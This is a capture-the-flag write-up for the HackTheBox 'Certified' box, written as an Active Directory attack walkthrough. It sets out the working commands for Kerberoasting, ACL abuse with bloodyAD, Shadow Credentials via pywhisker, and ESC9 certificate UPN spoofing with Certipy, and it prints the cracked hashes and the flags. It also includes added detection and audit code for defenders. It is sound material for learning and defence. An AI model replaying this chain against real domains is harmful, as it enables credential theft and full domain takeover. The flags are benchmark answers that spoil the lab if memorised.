Box Info
  • Name: Certified
  • OS: Windows
  • Difficulty: Medium
  • IP: 10.10.11.41

Setup

mkdir -p ~/ctf/HackTheBox/certified/scans; cd ~/ctf/HackTheBox/certified

IP Address: 10.10.11.41

echo "10.10.11.41 certified.htb" | sudo tee -a /etc/hosts

10.10.11.41 certified.htb


As this is an Assumed Breach scenario box, we are given the following credentials to start with:

judith.mader:judith09

Enumeration

nmap -sC -sV -Pn -p- certified.htb -oN scans/nmap -vv

nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 certified.htb

# nmap findings
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49689/tcp open  unknown          syn-ack ttl 127
49690/tcp open  unknown          syn-ack ttl 127
49691/tcp open  unknown          syn-ack ttl 127
49720/tcp open  unknown          syn-ack ttl 127
49729/tcp open  unknown          syn-ack ttl 127

Now, using NetExec and the provided credentials, we enumerate LDAP (port 389) and SMB (port 445).

Shares:

Users:

Administrator
Guest
krbtgt
judith.mader
management_svc
ca_operator
alexander.huges
harry.wilson
gregory.cameron

Using LDAP enumeration, we find that the user management_svc is Kerberoastable:

Using Hashcat we try to crack this hash with .\hashcat.exe -m 13100 .\hash.txt .\rockyou.txt but are unsuccessful.

Using nxc ldap 10.10.11.41 -d certified.htb -u judith.mader -p judith09 --dns-server 10.10.11.41 --bloodhound -c All we get a BloodHound zip file to enumerate further.

Using BloodHound we find that we can traverse to ca_operator along the following path:

Setting the Management group's owner to Judith

Using the bloodyAD tool we set the owner to judith: bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 set owner Management judith.mader

With the command below we grant judith GenericAll rights on the Management group so that we can add judith to the group: bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader

Now we add the judith user to Management, which also gives us the group's GenericWrite rights on the management_svc user.

bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add groupMember Management judith.mader

GenericWrite on Management_SVC

To exploit this we use pywhisker for a Shadow Credentials attack.

./pywhisker -d certified.htb -u judith.mader -p judith09 --target management_svc --action add --filename mgmt_svc

python3 PKINITtools/gettgtpkinit.py -cert-pfx venv/bin/mgmt_svc.pfx -pfx-pass xXGg4pFUaqdvN04gqYuF certified.htb/management_svc management_svc.ccache

python3 PKINITtools/getnthash.py -key 1ff1c8b4ea8d572eb1f773b5481a026a23e10b2a724caeb889ee398319724525 certified.htb/management_svc

From the Shadow Credentials attack above we get the NT hash of the management_svc user:

management_svc:a091c1832bcdd4677c28b5a6a1295584

Using NetExec we verify this is the correct hash:

We have WinRM access as management_svc.
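The owner/DACL/member writes from the BloodHound path and the msDS-KeyCredentialLink write from the Shadow Credentials step all surface as Directory Service Changes events (Event ID 5136) when object auditing is enabled. The following is an added detection example of mine, not part of the original writeup; the event dicts are constructed to imitate parsed 5136 fields, and the DNs and the allow-list of expected writers are assumptions.

```python
# Attribute written in the 5136 event -> the step in this writeup it corresponds to
SENSITIVE_ATTRS = {
    "nTSecurityDescriptor": "owner/DACL change (bloodyAD set owner, add genericAll)",
    "member": "group membership change (bloodyAD add groupMember)",
    "msDS-KeyCredentialLink": "Shadow Credentials added (pywhisker --action add)",
}
# Principals expected to make such writes: an assumed allow-list, not from the box
EXPECTED_WRITERS = {"Administrator", "DC01$"}

def classify_5136(events, expected_writers=EXPECTED_WRITERS):
    """Return (subject, attribute, target DN, reason) for each sensitive write
    made by a principal outside the allow-list."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        attr = ev["AttributeLDAPDisplayName"]
        if attr not in SENSITIVE_ATTRS or ev["SubjectUserName"] in expected_writers:
            continue
        findings.append((ev["SubjectUserName"], attr, ev["ObjectDN"], SENSITIVE_ATTRS[attr]))
    return findings

def escalation_chain(findings):
    """Subjects that wrote two or more different sensitive attributes: one
    low-privileged user doing owner -> DACL -> member -> KeyCredentialLink is the
    BloodHound path above, not routine administration."""
    per_subject = {}
    for subject, attr, _, _ in findings:
        per_subject.setdefault(subject, set()).add(attr)
    return {s: sorted(a) for s, a in per_subject.items() if len(a) >= 2}

# Constructed 5136 events (fields as parsed from the event XML; DNs are assumptions); %%14674 = Value Added
MGMT = "CN=Management,CN=Users,DC=certified,DC=htb"
SVC = "CN=management_svc,CN=Users,DC=certified,DC=htb"
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "judith.mader", "ObjectDN": MGMT,
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "judith.mader", "ObjectDN": MGMT,
     "AttributeLDAPDisplayName": "member", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "judith.mader", "ObjectDN": SVC,
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "Administrator", "ObjectDN": MGMT,  # routine change
     "AttributeLDAPDisplayName": "member", "OperationType": "%%14674"},
]

if __name__ == "__main__":
    hits = classify_5136(SAMPLE_EVENTS)
    print(*hits, escalation_chain(hits), sep="\n")
```

5136 events only appear for objects that carry a SACL for the relevant write, so the check is only as good as the audit policy on the group and service account objects.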


User Flag

Location: C:\Users\management_svc\Desktop | Flag: b4f932ca96fde437b29e2b73dd312357

Privilege Escalation

GenericAll rights on CA_Operator

Using bloodyAD --host 10.10.11.41 -d certified.htb -u management_svc -p :a091c1832bcdd4677c28b5a6a1295584 set password ca_operator Password@1! we change the password of the ca_operator account, since management_svc has GenericAll rights over ca_operator.

Certipy

Using certipy find -u ca_operator@certified.htb -p 'Password@1!' -dc-ip 10.10.11.41 -vulnerable -text -enabled we find that the 'CertifiedAuthentication' template is vulnerable to ESC9 (the template has no security extension).

Since management_svc has GenericAll over ca_operator, we use certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator to spoof the UPN of ca_operator.

Using certipy req -username ca_operator@certified.htb -hashes dbf36575210cc5a38ab4050cc6a2e9aa -ca certified-DC01-CA -template CertifiedAuthentication we request the certificate; since this template disables the security extension, the certificate is trusted on the basis of the UPN field alone.

Using the obtained certificate we authenticate and get the NT hash with certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb':

administrator:0d5b49608bbce1751f708748f67e2d34

Now we revert the UPN of ca_operator back to the original.
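The ESC9 chain above needs a template that omits the security extension and still serves client authentication with a UPN-based SAN, a KDC that is not in full strong certificate binding enforcement, and a UPN rewritten to collide with another account. The following audit helper is an added example of mine, not Certipy's code; the CertifiedAuthentication attribute values are constructed assumptions, the flag constants come from MS-CRTD, and the registry value is the one introduced by the KB5014754 hardening. It checks only the template and KDC side; the GenericWrite/GenericAll over a victim account is a separate ACL finding.

```python
# Flag bits from msPKI-Enrollment-Flag and msPKI-Certificate-Name-Flag (MS-CRTD)
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000    # msPKI-Enrollment-Flag
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000  # msPKI-Certificate-Name-Flag
CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"         # id-kp-clientAuth

def esc9_findings(template, strong_binding_enforcement=1):
    """Return the ESC9 preconditions that hold for one template record.
    strong_binding_enforcement mirrors the DC registry value
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc\\StrongCertificateBindingEnforcement
    (2 = full enforcement, which defeats the spoofed-UPN mapping)."""
    if not template.get("enabled", True):
        return []
    findings = []
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_NO_SECURITY_EXTENSION:
        findings.append("no szOID_NTDS_CA_SECURITY_EXT in issued certs (CT_FLAG_NO_SECURITY_EXTENSION)")
    if CLIENT_AUTH_EKU in template["pKIExtendedKeyUsage"]:
        findings.append("client authentication EKU")
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_SUBJECT_ALT_REQUIRE_UPN:
        findings.append("SAN built from the enrollee's userPrincipalName")
    if strong_binding_enforcement != 2:
        findings.append("KDC StrongCertificateBindingEnforcement != 2")
    return findings

def is_esc9(template, strong_binding_enforcement=1):
    # All four conditions must hold for the certificate to map to the spoofed UPN
    return len(esc9_findings(template, strong_binding_enforcement)) == 4

def harden(template):
    """Copy of the template with the security extension re-enabled (template-side fix)."""
    fixed = dict(template)
    fixed["msPKI-Enrollment-Flag"] &= ~CT_FLAG_NO_SECURITY_EXTENSION
    return fixed

def upn_collision(new_upn, sam_account_names):
    """True when the user part of a rewritten UPN equals another account's
    sAMAccountName, the shape 'certipy account update ... -upn Administrator' leaves."""
    user_part = new_upn.split("@")[0].lower()
    return user_part in {s.lower() for s in sam_account_names}

# Constructed record for the vulnerable template; the flag values are assumptions
CERTIFIED_AUTH = {
    "name": "CertifiedAuthentication", "enabled": True,
    "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION,
    "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
    "pKIExtendedKeyUsage": [CLIENT_AUTH_EKU],
}

if __name__ == "__main__":
    print(*esc9_findings(CERTIFIED_AUTH), sep="\n")
    print("hardened still ESC9:", is_esc9(harden(CERTIFIED_AUTH)))
```

The UPN rewrite itself is visible as a User Account Management event (Event ID 4738) whose User Principal Name field changes, so upn_collision can be run over those events against the list of sAMAccountNames enumerated earlier.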

We verify the access using nxc and evil-winrm:


Root Flag

Location: C:\Users\Administrator\Desktop | Flag: a5404d7db96e03dfa194c6ba6c04dffb